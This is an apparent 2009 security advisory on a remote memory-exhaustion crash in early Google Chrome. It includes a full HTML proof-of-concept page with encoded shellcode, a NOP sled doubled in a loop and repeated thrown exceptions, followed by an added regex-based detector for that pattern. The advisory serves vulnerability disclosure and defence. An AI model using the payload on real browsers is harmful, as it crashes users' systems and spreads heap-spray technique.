Google Chrome version 1.0.154.53 "throw exception" remote crash and denial of se
Source: http://www.secniche.org/gthr  Author: Sood  Published: 2009-04-29

Google Chrome 1.0.154.59 "throw exception" Memory Corruption Vulnerability.

Version Affected:
1.0.154.59. Previous versions are vulnerable too.

Description:
The Google Chrome browser is vulnerable to a memory-exhaustion denial of
service that can be triggered remotely. The vulnerability results from
arbitrary shellcode that is rendered in a script tag, with an exception
raised directly by a throw statement. This makes the browser consume
memory, which impacts the focused window and leads to a crash. The impact
can be severe, depending on the system.

Proof of Concept:
http://www.secniche.org/gthr

Detection:
SecNiche confirmed that this vulnerability affects Google Chrome on the
Microsoft Windows XP SP2 platform. The version tested is 1.0.154.59.

Disclosure Timeline:
Release Date: April 28, 2009

Credit:
Aditya K Sood

Disclaimer:
The information in the advisory is believed to be accurate at the time of
publishing based on currently available information. Use of the
information constitutes acceptance for use in an AS IS condition. There is
no representation or warranties, either express or implied by or with
respect to anything in this document, and shall not be liable for any
implied warranties of merchantability or fitness for a particular purpose
or for any indirect special or consequential damages.

-------------------------------------------

<html>
<head>
<title>Google Chrome 1.0.154.53 "throw exception" Remote Crash and Denial of Service -  </title>
<script language="JavaScript">
 var nop_sled=unescape("%u9090");
 var shellcode_sled=unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%u7e68%ue2d8%u6873%ufe98%u0e8a%uff57%u63e7%u6c61%u2e63%u7865%u0065");
 for(var i=0;i<64;i++){
  nop_sled=nop_sled+nop_sled;
  document.write('<script>throw nop_sled+shellcode_sled;</scr'+'ipt>');
 }
</script>
</head>
<body>
<center><h1> Google Chrome 1.0.154.53 "throw exception" Remote Crash and Denial of Service</h1>
<h2> Executing NOP Sled and Shellcode to create an Exception</h2>

<h2> SecNiche Security (C) Aditya K Sood </h2>
</center></body>
</html>
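
A static check for the script pattern in the proof of concept above, as an added example that is not part of the original advisory or SecNiche's code: it flags %u-encoded unescape() strings, a string doubled inside a counted loop, and document.write() emitting a script that throws. The rule names, the MAX_DOUBLINGS threshold and both sample pages are assumptions constructed for illustration.

```javascript
// Added example: static heuristic for the script pattern this advisory describes.
// Rule names, the threshold and both samples are assumptions made for illustration.
const MAX_DOUBLINGS = 28; // assumed limit: 2^28 UTF-16 chars is already 512 MiB

// Return the bodies of inline <script> elements found in an HTML string.
function extractScripts(html) {
  const re = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  return [...html.matchAll(re)].map((m) => m[1]);
}

// Flag the three traits of the pattern: %u-encoded unescape() strings, a string
// doubled inside a counted loop, and document.write() emitting <script>throw.
function analyze(html) {
  const findings = [];
  for (const js of extractScripts(html)) {
    const enc = js.match(/unescape\(\s*(["'])(?:%u[0-9a-f]{4})+\1\s*\)/gi) || [];
    if (enc.length) findings.push({ rule: "u-encoded-unescape", count: enc.length });
    const loop = /\bfor\s*\([^;]*;\s*\w+\s*<\s*(\d+)\s*;/.exec(js);
    const dbl = /\b(\w+)\s*(?:=\s*\1\s*\+\s*\1|\+=\s*\1)\b/.exec(js);
    if (loop && dbl && loop.index < dbl.index) {
      const doublings = Number(loop[1]); // final length = initial length * 2^doublings
      findings.push({ rule: "string-doubling-loop", variable: dbl[1], doublings,
                      exceedsLimit: doublings > MAX_DOUBLINGS });
    }
    if (/document\.write\([^)]*<script>\s*throw\b/i.test(js)) {
      findings.push({ rule: "written-script-throw" });
    }
  }
  return findings;
}

// Constructed sample with the same shape as the pattern; filler values only.
const SUSPECT = `<html><head><script>
 var pad = unescape("%u4141");
 var filler = unescape("%u4242%u4343");
 for (var i = 0; i < 64; i++) {
  pad = pad + pad;
  document.write('<script>throw pad+filler;</scr'+'ipt>');
 }
</script></head><body></body></html>`;

// Constructed benign sample: a loop that grows a string linearly.
const BENIGN = `<html><body><script>
 var out = "";
 for (var i = 0; i < 64; i++) { out += "row " + i; }
 document.write(out);
</script></body></html>`;

console.log(JSON.stringify({ suspect: analyze(SUSPECT), benign: analyze(BENIGN) }, null, 1));
```

The check is regex-based and only reads inline scripts, so it suits triage of saved pages or proxy captures rather than a complete JavaScript analysis.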


 